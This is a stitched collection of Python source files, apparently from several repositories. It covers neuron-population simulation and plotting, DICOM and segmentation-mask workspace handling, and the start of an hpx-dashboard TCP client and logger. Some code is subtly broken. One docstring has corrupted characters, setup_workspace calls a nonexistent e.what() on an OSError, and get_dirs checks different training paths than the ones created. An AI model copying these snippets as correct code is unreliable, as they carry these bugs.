gs = gridspec.GridSpec(num_plots, 1, height_ratios=height_ratios)
ax1 = plt.subplot(gs[0])
if title:
ax1.set_title(title)
plots = dict()
if w:
new_A = moving_average(A, w)
(plots["p"],) = ax1.plot(
ts_P[begin_P_idx + w // 2 - 1 : -w // 2],
new_A[begin_P_idx:],
"--k",
label=r"$25\cdot10^3$ neurons",
)
else:
(plots["p"],) = ax1.plot(
ts_P[begin_P_idx:], A[begin_P_idx:], "--k", label=r"$25\cdot10^3$ neurons"
)
(plots["ASMA"],) = ax1.plot(ts_ASMA[begin_idx:], A_t_ASMA[begin_idx:], "-r", label="ASMA")
if plot_QR:
(plots["QR"],) = ax1.plot(ts_QR[begin_idx:], A_t_QR[begin_idx:], "-b", label="QR")
ax1.set_ylim(ylim[0], ylim[1])
ax1.set_xlim(ts_ASMA[begin_idx], ts_ASMA[-1])
ax1.set_ylabel(r"Activity $A_t$ (Hz)")
if num_plots == 1:
ax1.set_xlabel(r"Time $t$ (s)")
else:
ax1.tick_params(direction="in")
if inset:
x1, x2, y1, y2 = inset[1]
axins = ax1.inset_axes(inset[0])
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
if w:
w = 3
new_A = moving_average(A, w)
axins.plot(
ts_P[begin_P_idx + w // 2 - 1 : -w // 2],
new_A[begin_P_idx:],
"--k",
label=r"$25\cdot10^3$ neurons",
)
else:
axins.plot(ts_P[begin_P_idx:], A[begin_P_idx:], "--k", label=r"$25\cdot10^3$ neurons")
axins.plot(ts_ASMA[begin_idx:], A_t_ASMA[begin_idx:], "-r", label="ASMA")
if plot_QR:
axins.plot(ts_QR[begin_idx:], A_t_QR[begin_idx:], "-b", label="QR")
axins.set_xticklabels("")
axins.set_yticklabels("")
ax1.indicate_inset_zoom(axins, edgecolor="black")
ax1.legend(handles=plots.values(), loc=loc)
i = 1
I_ylim = I_ylim if I_ylim else (base_I + I_ext) * 1.1
if plot_H:
ax = plt.subplot(gs[i], sharex=ax1)
i += 1
ax.set_ylim(0, I_ylim)
ax.plot(ts_P[begin_idx:], H[begin_idx:], "--k")
ax.plot(ts_ASMA[begin_idx:], h_t_ASMA[begin_idx:], "-r")
if plot_QR:
ax.plot(ts_QR[begin_idx:], h_t_QR[begin_idx:], "-b")
ax.set_ylabel(r"$h_t$ (mV)")
ax.tick_params(direction="in")
if i == num_plots:
ax.tick_params(direction="out")
ax.set_xlabel(r"Time $t$ (s)")
if plot_I:
ax = plt.subplot(gs[i], sharex=ax1)
i += 1
ax.set_ylim(0, I_ylim)
ax.plot(ts_ASMA[begin_idx:], I_ext_vec[begin_idx:], "-k")
ax.set_xlabel(r"$t$ (s)")
ax.set_ylabel(r"$I^{\text{ext}}$ (A)")
ax.tick_params(direction="in")
if i == num_plots:
ax.tick_params(direction="out")
ax.set_xlabel(r"Time $t$ (s)")
if save:
if dpi:
fig.savefig(os.path.join(savepath, savename), dpi=dpi, transparent=True)
else:
fig.savefig(os.path.join(savepath, savename), transparent=True)
if not noshow:
plt.show()
```
#### File: plots/final/A_inf.py
```python
import time
import copy
import os
from multiprocessing import Pool
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM, moving_average
from flowrect.simulations import (
particle_population_nomemory,
ASA1,
quasi_renewal_pde,
)
def _simulate_QR(args):
I_ext, params, a_cutoff = args
t = time.time()
params["I_ext"] = I_ext
ts_QR, _, _, _, _, A_QR = quasi_renewal_pde(a_cutoff=a_cutoff, **params)
print(f"I_ext = {I_ext:.2f}, QR done in {time.time() -t:.2f}s")
Ainf_QR = A_QR[-1]
return Ainf_QR
def _simulate_pdes(args):
I_ext, params, a_cutoff = args
t = time.time()
params["I_ext"] = I_ext
ts_PDE, _, _, _, _, _, A_PDE = ASA1(a_cutoff=a_cutoff, **params)
print(f"I_ext = {I_ext:.2f}, PDE done in {time.time() -t:.2f}s")
Ainf_PDE = A_PDE[-1]
return Ainf_PDE
def _simulate_particle(args):
I_ext, params, N, w = args
t = time.time()
cparams = copy.copy(params)
cparams["I_ext"] = I_ext
ts_P, A_P, _, _ = particle_population_nomemory(N=N, **cparams)
dt = ts_P[1] - ts_P[0]
new_A = A_P
if w:
new_A = moving_average(A_P, w)
# Take the last seconds in activity
last_seconds_idx = len(new_A) - 1 - int(1 / dt * 5)
last_A_P = new_A[last_seconds_idx:]
Ainf_P = np.mean(last_A_P)
Ainf_std_P = np.std(last_A_P)
print(f"I_ext = {I_ext:.2f}, Particle done in {time.time() -t:.2f}s")
return Ainf_P, Ainf_std_P
def plot_A_inf(
params,
N,
pool,
num_sim=30,
num_p_sim=10,
I_end=5,
w=None,
cache_path="cache",
cache_suppl_name="",
QR_params=None,
p_params=None,
a_cutoff=7,
savepath="",
savename="",
save=False,
usetex=False,
figsize=(8, 8),
dpi=None,
title=None,
font_family="serif",
font_size="12",
noshow=False,
):
if usetex:
plt.rc("text", usetex=True)
plt.rc("font", family=font_family, size=font_size)
# External input range
I_vec = np.linspace(0, I_end, num_sim)
I_vec_p = np.linspace(0, I_end, num_p_sim)
# Parameters
if not p_params:
p_params = copy.deepcopy(params)
if not QR_params:
QR_params = copy.deepcopy(params)
# Check for cache
t = time.time()
params_multi_pde = [(I_vec[i], params, a_cutoff) for i in range(len(I_vec))]
pde_res = pool.map(_simulate_pdes, params_multi_pde)
params_multi_QR = [(I_vec[i], QR_params, a_cutoff) for i in range(len(I_vec))]
QR_res = pool.map(_simulate_QR, params_multi_QR)
params_multi_p = [(I_vec_p[i], p_params, N, w) for i in range(len(I_vec_p))]
p_res = pool.map(_simulate_particle, params_multi_p)
Ainf_PDE = []
Ainf_QR = []
Ainf_P = []
Ainf_std_P = []
# Fetch results
for A_PDE in pde_res:
Ainf_PDE.append(A_PDE)
for A_QR in QR_res:
Ainf_QR.append(A_QR)
for A_P, A_std_P in p_res:
if A_P:
Ainf_P.append(A_P)
Ainf_std_P.append(A_std_P)
plt.figure()
if title:
plt.title(title)
plt.plot(I_vec, Ainf_PDE, "-r", label="ASMA")
plt.plot(I_vec, Ainf_QR, "-b", label="QR")
plt.errorbar(I_vec_p, Ainf_P, Ainf_std_P, fmt=".k", capsize=2.0, label=r"$25\cdot10^3$ neurons")
plt.xlabel(r"$I_1$ (A)")
plt.ylabel(r"$A_{\infty}$ (Hz)")
plt.legend()
plt.tight_layout()
if save:
if dpi:
plt.savefig(os.path.join(savepath, savename), dpi=dpi, transparent=True)
else:
plt.savefig(os.path.join(savepath, savename), transparent=True)
if not noshow:
plt.show()
```
#### File: plots/midterm/activity.py
```python
import time
import copy
import os
from multiprocessing import Pool
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import gridspec
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM
from flowrect.simulations import particle_population
from flowrect.simulations import flow_rectification
from flowrect.simulations import quasi_renewal
save = False
save_path = ""
save_name = "activity.pdf"
def moving_average(x, w):
return np.convolve(x, np.ones(w), "valid") / w
dt = 1e-2
N = 25000
I_ext = 2.5
# Take similar as in article
time_end = 40
params = dict(
time_end=time_end,
dt=dt,
Lambda=[1.0, 5.5],
Gamma=[-4.0, -1.0],
# Lambda=np.array([28.0, 8.0, 1.0]),
# Gamma=np.array([-3.5, 3.0, -1.0]),
c=1,
lambda_kappa=2,
I_ext=I_ext,
I_ext_time=20,
interaction=0,
)
print(f"QR approximation")
QR_params = copy.copy(params)
QR_params["dt"] = 1e-2
t = time.time()
ts_QR, A_QR, cutoff = quasi_renewal(**QR_params)
print(f"{time.time() - t:.2f}s")
print(f"Particle simulation")
t = time.time()
ts, M, spikes, A, X = particle_population(**params, N=N, Gamma_ext=True)
m_t = calculate_mt(M, spikes)
A_av = moving_average(A, 50)
# m_ts = np.zeros(m_t.T.shape)
# w = 50
# m_ts[: -w + 1, 0] = moving_average(m_t.T[:, 0], w)
# m_ts[: -w + 1, 1] = moving_average(m_t.T[:, 1], w)
# m_ts[-w + 1 :, :] = m_ts[-w, :]
print(f"{time.time() - t:.2f}")
print(f"Flow rectification approximation")
t = time.time()
ts, a_grid, rho_t, m_t_exact, x_t, en_cons, A_t = flow_rectification(a_cutoff=10, **params)
print(f"{time.time() - t:.2f}s")
I_ext_vec = np.concatenate((np.zeros(int(len(ts) / 2)), I_ext * np.ones(int(len(ts) / 2))))
from_t = int(5 / dt)
fig = plt.figure(figsize=(8, 8))
gs = gridspec.GridSpec(2, 1, height_ratios=[5, 1])
ax1 = plt.subplot(gs[0])
# fig.suptitle(r"Activity response to a step input ($\Delta t=10^{-2}$)")
(A_1,) = ax1.plot(ts[from_t:], A[from_t:], "--k", linewidth=0.5, label=f"Particle ({N=})")
(A_2,) = ax1.plot(ts[from_t : len(A_av)], A_av[from_t:], "--r", label="P. rolling av.")
(A_3,) = ax1.plot(ts[from_t:], A_t[from_t:], "-.g", linewidth=1.5, label="PDE")
(A_4,) = ax1.plot(ts_QR[from_t:], A_QR[from_t:], "-b", linewidth=1.5, label="QR")
ax1.set_ylim(0, 1.5)
ax1.set_ylabel(r"$A(t)$ (Hz)")
ax1.legend(handles=[A_1, A_2, A_3, A_4])
ax2 = plt.subplot(gs[1], sharex=ax1)
ax2.plot(ts[from_t:], I_ext_vec[from_t:], "-k")
ax2.set_xlabel(r"$t$ (s)")
ax2.set_xlim(5, time_end)
ax2.set_ylabel(r"$I_0$ (A)")
if save:
fig.savefig(os.path.join(save_path, save_name), transparent=True)
plt.show()
```
#### File: plots/midterm/particle_animated.py
```python
import time
import copy
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import gridspec
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM
from flowrect.simulations import particle_population, flow_rectification, quasi_renewal
# Plot saving parameters
save = False
save_path = ""
save_name = "leaky_mem_anim.mp4"
# Simulation parameters
N = 500
dt = 1e-3
params = dict(
time_end=10,
dt=dt,
# Lambda=[5.0, 2.5],
# Gamma=[-4.0, 1.0],
Lambda=np.array([28.0, 8.0, 1.0]),
Gamma=np.array([-3.5, 3.0, -1.0]),
c=10,
lambda_kappa=1,
I_ext=1,
I_ext_time=20,
interaction=0.1,
)
print(f"Particle simulation")
t = time.time()
ts, M, spikes, A, X = particle_population(**params, N=N, Gamma_ext=True)
print(f"{time.time() - t:.2f}")
# Animated plots
class AnimatedPlot:
def __init__(self, xlim=10, ylim=10):
self.fig = plt.figure(figsize=(6, 8))
gs = gridspec.GridSpec(2, 1, height_ratios=[5, 1])
self.fig.suptitle(fr"Leaky memory population simulation ($N=${N})")
self.ax1 = plt.subplot(gs[0])
self.ax2 = plt.subplot(gs[1])
self.xlim, self.ylim = xlim, ylim
self.plots = {}
def init_plot(self):
# M scatter plot
self.plots["scat"] = self.ax1.scatter([], [], c="r", s=0.4)
self.ax1.set_aspect("equal")
self.plots["title"] = self.ax1.text(
0.5,
0.85,
"",
bbox={"facecolor": "w", "alpha": 0.5, "pad": 5},
transform=self.ax1.transAxes,
ha="center",
)
self.ax1.set_xlabel(r"$M_1$ (mV)")
self.ax1.set_ylabel(r"$M_2$ (mV)")
self.ax1.set_xlim(-self.xlim, self.xlim)
self.ax1.set_ylim(-self.ylim, self.ylim)
# Activity plot
mask = spikes.T == 1
self.plots["vline"] = self.ax2.plot([], [], "-r", linewidth=1)[0]
for i in range(N):
self.ax2.eventplot(
ts[mask[i]],
lineoffsets=i + 0.5,
colors="black",
linewidths=0.5,
)
self.ax2.set_ylim(0, N)
self.ax2.set_xlabel(r"$t$ (s)")
self.ax2.set_ylabel(r"Spikes")
self.ax2.set_yticks([])
return tuple(self.plots.values())
def animate(self, i):
t = dt * i
# Scatter
self.plots["title"].set_text(fr"Time $t=${t:.2f}s")
self.plots["scat"].set_offsets(M[i, :, 0:2])
self.plots["vline"].set_data(np.array([t, t]), np.array([0, N]))
return tuple(self.plots.values())
# Scatter plot
lim = 10
pl = AnimatedPlot(xlim=lim, ylim=lim)
anim_int = 40
ani = animation.FuncAnimation(
pl.fig,
func=pl.animate,
frames=range(0, len(M), anim_int),
init_func=pl.init_plot,
interval=anim_int,
blit=True,
)
if save:
ani.save(os.path.join(save_path, save_name))
plt.show()
```
#### File: simulations/pdes/second_order.py
```python
import numpy as np
import time
from numba import jit, prange
from ..util import f_SRM
# Not used
# @jit(nopython=True, cache=True)
def _fast_pde(
time_end,
dt,
a_grid,
a_grid_size,
exp_La,
Lambda,
Gamma,
c,
Delta,
theta,
lambda_kappa,
I_ext,
I_ext_time,
interaction,
m_t0,
n_t0,
):
""""""
steps = int(time_end / dt)
dim = Gamma.shape[0]
# Init vectors
ts = np.linspace(0, time_end, steps)
rho_t = np.zeros((steps, a_grid_size)) # Probability density distribution
m_t = np.zeros((steps, dim)) # First moment vector
n_t = np.zeros((steps, dim, dim)) # Second moments vector
V_t = np.zeros((steps, dim, dim)) # Semi-definite covariance matrix
x_t = np.zeros(steps) # Interaction parameter
# Initial conditions
m_t[0] = m_t0
n_t[0] = n_t0
rho_t[0, 0] = 1 / dt # All the mass is concentrated at age 0 in the beginning of sim.
J = interaction # interaction = J from our equations
da = dt
# Precompute values
Lambda_i_plus_j = np.stack((Lambda,) * dim) + np.stack((Lambda,) * dim).T
exp_La_ij = np.exp(-np.einsum("ij,k->kij", Lambda_i_plus_j, a_grid))
# # Initial step
x_fixed = I_ext if I_ext_time == 0 else 0
m_t_sum = np.sum(exp_La * m_t[0], axis=1)
G0 = f_SRM(m_t_sum + x_t[0], c=c)
G1 = 0
G2 = 0
for s in range(1, steps):
x_fixed = I_ext if I_ext_time < dt * s else 0
# Basis calculations for the Gaussian moments
exp_variance = (V_t[s - 1] @ exp_La.T).T # Makes a (a_grid_size, dim) matrix
gauss_param = m_t[s - 1] + 0.5 * exp_variance # (a_grid_size, dim) matrix
# g corresponds to c * exp(h + e^-Lambda.a (m + 1/2 V e^-Lambda.a))
g = c * np.exp(x_t[s - 1] + np.sum(exp_La * gauss_param, axis=1)) # (a_grid_size,) vector
moment1 = m_t[s - 1] + exp_variance # (a_grid_size, dim) matrix
# Gaussian moments
G0 = g
G1 = (moment1.T * g).T
G2 = ((V_t[s - 1] + np.einsum("ij,ik->ijk", moment1, moment1)).T * g).T
# This values are reused in multiple calculations
LambdaGamma = Lambda * Gamma
# Store the expression that is in curly brackets for evolution of m_t
m_t_curly_bracket_expr = (exp_La - 1) * G1 + np.einsum("i,j->ji", LambdaGamma, G0)
m_t[s] = m_t[s - 1] + dt * np.einsum("ij,i->j", m_t_curly_bracket_expr, da * rho_t[s - 1])
# Update second moments
part_0moment = np.einsum("i,j,k->kij", LambdaGamma, LambdaGamma, G0)
part_1moment_ij = np.einsum("ki,j,ki->kij", exp_La, LambdaGamma, G1)
part_1moment_ji = np.einsum("kj,i,kj->kij", exp_La, LambdaGamma, G1)
part_2moment = (exp_La_ij - 1) * G2
moment_sum = part_0moment + part_1moment_ij + part_1moment_ji + part_2moment
n_t[s] = n_t[s - 1] + dt * np.sum(
np.einsum("i,ijk->ijk", rho_t[s - 1], moment_sum) * da,
axis=0,
)
# Update covariance matrix
V_t[s] = n_t[s] - np.outer(m_t[s], m_t[s])
# Update self interaction
x_t[s] = x_t[s - 1] + dt * (
-lambda_kappa * x_t[s - 1]
+ lambda_kappa * (np.sum(G0 * rho_t[s - 1] * da) * J + x_fixed)
)
rho_t[s] = rho_t[s - 1]
# Mass loss
intensity = np.clip(G0 * dt, 0, 1) # Limit transfer
mass_transfer = rho_t[s] * intensity
rho_t[s] -= mass_transfer
lass_cell_mass = rho_t[s, -1] # Last cell necessarely spikes
# Linear transport
rho_t[s, 1:] = rho_t[s, :-1]
# Mass insertion
rho_t[s, 0] = np.sum(mass_transfer) + lass_cell_mass
return ts, rho_t, m_t, n_t, x_t
def flow_rectification_2nd_order(
time_end,
dt,
Lambda,
Gamma,
c=1,
Delta=1,
theta=0,
interaction=0,
lambda_kappa=20,
I_ext_time=0,
I_ext=0,
m_t0=0,
n_t0=0,
a_cutoff=5,
):
"""
Calculates the flow rectification of second order for an exponential firing function.
Parameters
----------
time_end : float
Number of seconds of the simulation
dt : float
Size of the time step in the simulation
(recommended values are between 1e-2 and 1e-3)
Lambda : 1D numpy array
Parameters of the exponential decay in the eta function
Lambda[0] = lambda_1 ; Lambda[1] = lambda_2 ; ...
c : float
base firing rate (in the function f(u) = c*exp(t))
lambda_kappa : float
exponential decay that is in the kappa function
I_ext : float
strength of an external constant current (must be specified along with I_ext_time)
I_ext_time : float
time (in seconds) at which the external constant current is injected
interaction : float
self-interaction strength
a_cutoff : float
maximum considered age in the simulation (in seconds)
"""
if isinstance(Gamma, (float, int)):
Gamma = [Gamma]
if isinstance(Lambda, (float, int)):
Lambda = [Lambda]
Gamma = np.array(Gamma)
Lambda = np.array(Lambda)
dim = Gamma.shape[0]
# Need dt = da
a_grid_size = int(a_cutoff / dt)
a_grid = np.linspace(0, a_cutoff, a_grid_size)
a_d_grid = np.vstack((a_grid,) * dim).T
# Shape must be in order: len, d, d
exp_La = np.exp(-Lambda * a_d_grid)
# Simulation
ts, rho_t, m_t, n_t, x_t = _fast_pde(
time_end,
dt,
a_grid,
a_grid_size,
exp_La,
Lambda,
Gamma,
c,
Delta,
theta,
lambda_kappa,
I_ext,
I_ext_time,
interaction,
m_t0,
n_t0,
)
energy_conservation = np.sum(rho_t * dt, axis=-1)
activity = rho_t[:, 0]
return ts, a_grid, rho_t, m_t, n_t, x_t, energy_conservation, activity
```
#### File: flowrect/simulations/util.py
```python
import numpy as np
from numba import jit
from numba.extending import overload
def moving_average(x, w):
print("moving_av")
return np.convolve(x, np.ones(w), "valid") / w
@jit(nopython=True)
def calculate_age(array):
ret = np.zeros(array.shape)
for i in range(array.shape[0]):
count = 0
for j in range(array.shape[1]):
count += 1
if array[i, j]:
count = 0
ret[i, j] = 0
continue
ret[i, j] = count
return ret
calculate_age(np.array([[0]]))
@jit(nopython=True)
def replace_NaN(array):
prev_value = np.zeros(array.shape[1])
for i in range(len(array)):
if np.isnan(array[i, 0]):
array[i] = prev_value
else:
prev_value = array[i]
return array
def calculate_mt(M, spikes):
m_t = np.copy(M)
mask = spikes == 0
m_t[mask] = np.NaN
m_t = np.nanmean(m_t, axis=1)
m_t = replace_NaN(m_t)
return m_t
def calculate_nt(m_t):
return np.einsum("ai,aj->aij", m_t, m_t)
calculate_mt(np.zeros((10, 5, 2)), np.zeros((10, 5)))
@jit(nopython=True, nogil=True)
def f_SRM(x, c=1, Delta=1, theta=0):
return np.exp(x / Delta) * c
@jit(nopython=True)
def eta_SRM(x, Gamma, Lambda, tau=1):
ret = np.zeros(len(x))
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def eta_SRM_no_vector(x, Gamma, Lambda, tau=1):
ret = 0
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def kappa_interaction(t, lambda_kappa, strength):
return strength * np.exp(-lambda_kappa * t)
def h_exp_update(h_t, A_t, I_ext, lambda_kappa, dt, J):
return h_t + lambda_kappa * dt * (J * A_t + I_ext - h_t)
def h_erlang_update(h_t, k_t, A_t, I_ext, lambda_kappa, dt, J):
h = h_t + dt * lambda_kappa * (-h_t + k_t)
k = k_t + dt * lambda_kappa * (-k_t + J * A_t + I_ext)
return h, k
@overload(np.clip)
def np_clip(a, a_min, a_max, out=None):
def np_clip_impl(a, a_min, a_max, out=None):
if out is None:
out = np.empty_like(a)
for i in range(len(a)):
if a[i] < a_min:
out[i] = a_min
elif a[i] > a_max:
out[i] = a_max
else:
out[i] = a[i]
return out
return np_clip_impl
```
#### File: flowrect/widget/util.py
```python
import time
from abc import ABCMeta
from bokeh.models.widgets import Div
from bokeh.plotting import Figure
from bokeh.io import curdoc
class BaseElement(metaclass=ABCMeta):
""""""
instance_num = 0
def __init__(self, refresh_rate=100):
""""""
BaseElement.instance_num += 1
self._root = None
self._refresh_rate = refresh_rate
self._reset = False
def layout(self):
return self._root
def empty_placeholder():
return Div(text=" ")
class ThrottledEvent:
_callback = None
_lastcall = 0
_numcalls = 0
_total_time = 0
def __init__(self, fire_rate=None, refresh_rate=50):
"""fire_rate in ms"""
curdoc().add_periodic_callback(self._fire_event, refresh_rate)
if fire_rate:
self._dynamic_fire_rate = False
self._fire_rate = fire_rate / 1000
else:
self._dynamic_fire_rate = True
self._fire_rate = 0.05
def add_event(self, callback):
self._callback = callback
print(time.time() - self._lastcall, self._fire_rate)
if time.time() - self._lastcall > self._fire_rate:
t = time.time() - self._lastcall
print(f"Event added: {t}")
curdoc().add_next_tick_callback(self._call_and_measure)
def _call_and_measure(self):
self._numcalls += 1
self._lastcall = time.time()
prev = time.time()
self._callback()
self._callback = None
self._total_time += time.time() - prev
if self._dynamic_fire_rate:
# Use buffer (10)
self._fire_rate = self._total_time / self._numcalls
def _fire_event(self):
if self._callback and time.time() - self._lastcall > self._fire_rate:
curdoc().add_next_tick_callback(self._call_and_measure)
self._lastcall = time.time()
``` |
{
"source": "jokteur/BM-Segmenter",
"score": 2
} |
#### File: src/scripts/dataset.py
```python
import toml
import os
from .workspace import get_dirs, get_root
def load_dataset(path: str):
root_dir = get_root(path)
"""Loads dataset into project."""
filename = os.path.join(root_dir, "dataset.toml")
result = {}
group_names = []
dirs = get_dirs(root_dir)[1]
if os.path.isfile(filename):
data = toml.load(os.path.join(root_dir, "dataset.toml"))
if "groups" in data and "files" in data:
group_names = list(data["groups"].keys())
for id in data["files"]:
dicom_dir = os.path.join(dirs["dicoms"], id)
groups = [name for name, files in data["groups"].items() if id in set(files)]
files = [os.path.join(dicom_dir, name) for name in os.listdir(dicom_dir)]
result[id] = {"groups": groups, "files": files}
return result, group_names
```
#### File: src/scripts/import_data.py
```python
import os
import numpy as np
import toml
from .workspace import get_dirs, create_series_dir
from .load_dicom import load_scan_from_dicom
def import_dicom(
path: str, root_dir: str, id: str, num: int, ww: int, wc: int, crop_x, crop_y, replace=False
):
"""Imports dicom as a numpy matrix in the project folder
Arguments
---------
path : str
path to the dicom file
root_dir : str
path to the root of the project
id : str
name of the case (should be a number followed by an underscore)
replace : bool
if True, then even if the file exists, if is replaced
Returns
-------
True if the saved successfully, False if the file already exists
"""
id_dir = create_series_dir(root_dir, id)
filename = os.path.join(id_dir[0], str(num))
if not os.path.isfile(filename + ".npz") or replace:
pixels, spacing, thickness, location = load_scan_from_dicom(path)
np.savez_compressed(
filename,
matrix=pixels,
spacing=np.array(spacing),
windowing=np.array([ww, wc]),
crop_x=crop_x,
crop_y=crop_y,
slice_info=np.array([thickness, location]),
)
return True
else:
return False
def add_to_dataset(paths: list, group_name: str, root_dir: str):
"""Adds the list of paths to the dataset toml"""
filename = os.path.join(root_dir, "dataset.toml")
data = {"files": set(), "groups": {group_name: set()}}
if os.path.isfile(filename):
data = toml.load(os.path.join(root_dir, "dataset.toml"))
if not "files" in data:
data["files"] = set()
if not "groups" in data:
data["groups"] = {}
if not group_name in data["groups"]:
data["groups"][group_name] = set()
data["groups"][group_name] = set(data["groups"][group_name])
data["files"] = set(data["files"])
for path in paths:
path = os.path.basename(path)
data["files"].add(path)
data["groups"][group_name].add(path)
toml.dump(data, open(filename, "w"))
```
#### File: src/scripts/segmentation.py
```python
import os
import toml
import numpy as np
from .workspace import get_dirs, get_root
from .util import make_safe_filename
def save_segmentation(project_file: str, name: str, description: str, filename: str, color: list):
"""Saves a segmentation to a file."""
root = get_root(project_file)
dirs = get_dirs(root)[1]
save_path = ""
if filename:
save_path = filename
else:
save_path = os.path.join(dirs["models"], make_safe_filename(name) + ".seg")
if os.path.isfile(save_path):
raise Exception("Segmentation with near identical name already exists")
try:
os.mkdir(os.path.join(dirs["masks"], make_safe_filename(name)))
except FileExistsError:
pass
data = {
"name": name,
"description": description,
"stripped_name": make_safe_filename(name),
"color": color,
}
toml.dump(data, open(save_path, "w"))
return save_path
def load_segmentations(root_dir: str):
if not os.path.isdir(root_dir):
raise Exception("Project path is not a directory")
dirs = get_dirs(root_dir)[1]
segmentations = []
for path in os.listdir(dirs["models"]):
path = os.path.join(dirs["models"], path)
if os.path.isfile(path) and path.endswith(".seg"):
data = toml.load(path)
data["path"] = path
data["ids"] = [
name[:-4] for name in os.listdir(os.path.join(dirs["masks"], data["stripped_name"]))
]
segmentations.append(data)
return segmentations
def get_mask_path(dicom_id: str, path: str, name: str):
dirs = get_dirs(os.path.dirname(os.path.dirname(path)))[1]
return os.path.join(dirs["masks"], name, dicom_id)
def save_mask_collection(users: list, current, validated, prediction, filename: str):
users = [str(u) for u in users]
np.savez_compressed(
filename,
current=current,
validated=validated,
predicted=prediction,
users=np.array(users, dtype="object"),
)
def load_mask_collection(filename):
filename = filename + ".npz"
data = {}
if os.path.isfile(filename):
data = np.load(filename, allow_pickle=True)
ret = {"users": []}
if "current" in data:
if data["current"].shape:
ret["current"] = data["current"]
if "predicted" in data:
if data["predicted"].shape:
ret["predicted"] = data["predicted"]
if "validated" in data:
if data["validated"].shape:
ret["validated"] = data["validated"]
if "users" in data:
ret["users"] = list(data["users"])
return ret
```
#### File: src/scripts/util.py
```python
from operator import itemgetter
import re
def special_sort(ids):
"""Sort first by number, then alphabetically.
Returns
-------
list : sorted list
list : sorted argument list"""
numbers = {}
no_numbers = []
for i, id in enumerate(ids):
try:
digit = [not x.isdigit() for x in id].index(True)
except ValueError:
digit = len(id)
try:
number = int(id[:digit])
if not number in numbers:
numbers[number] = []
numbers[number].append((id, i))
except:
no_numbers.append((id, i))
numbers = sorted(numbers.items())
sorted_ids = []
for _, values in numbers:
sorted_ids += sorted(values)
sorted_ids += sorted(no_numbers)
return list(map(itemgetter(1), sorted_ids)), list(map(itemgetter(0), sorted_ids))
def make_safe_filename(s):
def safe_char(c):
if c.isalnum():
return c
else:
return "_"
stripped = "".join(safe_char(c) for c in s).rstrip("_")
return re.sub("_{2,}", "_", stripped)
```
#### File: src/scripts/workspace.py
```python
import os
from .util import make_safe_filename
def get_root(save_file: str):
return os.path.dirname(save_file)
def _make_folders(root: str):
try:
os.mkdir(os.path.join(root, "data"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "data", "dicoms"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "data", "masks"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp", "train"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp", "train", "x"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "tmp", "train", "y"))
except FileExistsError:
pass
try:
os.mkdir(os.path.join(root, "models"))
except FileExistsError:
pass
def setup_workspace(path: str, name: str, extension):
if os.path.isdir(path):
name = make_safe_filename(name)
try:
os.mkdir(os.path.join(path, name))
_make_folders(os.path.join(path, name))
except FileExistsError:
pass
except OSError as e:
return False, f"Could not create directories: {e.what()}"
return True, os.path.join(path, name, f"{name}.{extension}")
else:
return False, "Path is not a directory"
def get_dirs(path: str):
"""
Fetches and returns the directory structure found at the path
"""
if os.path.isdir(path):
dirs = {}
if os.path.isdir(os.path.join(path, "data", "dicoms")):
dirs["dicoms"] = os.path.join(path, "data", "dicoms")
if os.path.isdir(os.path.join(path, "data", "masks")):
dirs["masks"] = os.path.join(path, "data", "masks")
if os.path.isdir(os.path.join(path, "models")):
dirs["models"] = os.path.join(path, "models")
if os.path.isdir(os.path.join(path, "data", "train", "x")):
dirs["train_x"] = os.path.join(path, "data", "train", "x")
if os.path.isdir(os.path.join(path, "data", "train", "y")):
dirs["train_y"] = os.path.join(path, "data", "train", "y")
return True, dirs
else:
return False, "Path is not a directory"
def create_series_dir(path: str, id: str):
"""Creates a director6'pè^¨$ for a Dicom Series in the data/dicom folder."""
_make_folders(path)
try:
os.mkdir(os.path.join(path, "data", "dicoms", id))
except FileExistsError:
return os.path.join(path, "data", "dicoms", id), False
return os.path.join(path, "data", "dicoms", id), True
``` |
{
"source": "jokteur/hpx-dashboard",
"score": 3
} |
#### File: hpx_dashboard/agent/tcp_client.py
```python
import asyncio
import time
from ..common.constants import message_separator
from ..common.logger import Logger
async def connect(host: str, port: int, timeout=2):
""""""
writer = None
prev_time = time.time()
while True:
try:
_, writer = await asyncio.open_connection(host, port)
except (asyncio.TimeoutError, ConnectionRefusedError):
pass
if time.time() - prev_time > timeout:
break
if writer:
break
time.sleep(0.01)
return writer
async def send_data(host, port, timeout, queue, stop_signal):
""""""
writer = await connect(host, port, timeout)
logger = Logger()
if not writer:
logger.error(
f"Timeout error: could not connect to {host}:{port}" f" after {timeout} seconds"
)
stop_signal.stop = True
return
while True: # not stop_signal.stop:
line = queue.get()
if line is None:
break
try:
writer.write(line + message_separator)
await writer.drain()
except ConnectionResetError:
logger.error("Connection was reset while streaming data.")
break
queue.task_done()
return
```
#### File: hpx_dashboard/common/logger.py
```python
import logging
import sys
from .singleton import Singleton
class Logger(metaclass=Singleton):
"""Logging class which is a wrapper around the logging module.
The Logger class is a wrapper around the logging module which allows multiple console output
or file output. Logger is a singleton.
"""
def __init__(self, name="hpx-dashboard", formating="%(levelname)s - %(message)s"):
"""Sets the logging module with the specified format and logger name
Parameters
----------
name
name of the logging instance
formatting : optional
custom logging formatting string
"""
logging.basicConfig()
self.logger = logging.getLogger(name)
self.formatter = logging.Formatter(formating)
self.handlers = []
self.name = name
handler = logging.NullHandler()
handler.setFormatter(self.formatter)
self.handlers.append(handler)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO) # Default level
# Due to Bokeh serve messing up the logging module, this is a work-around
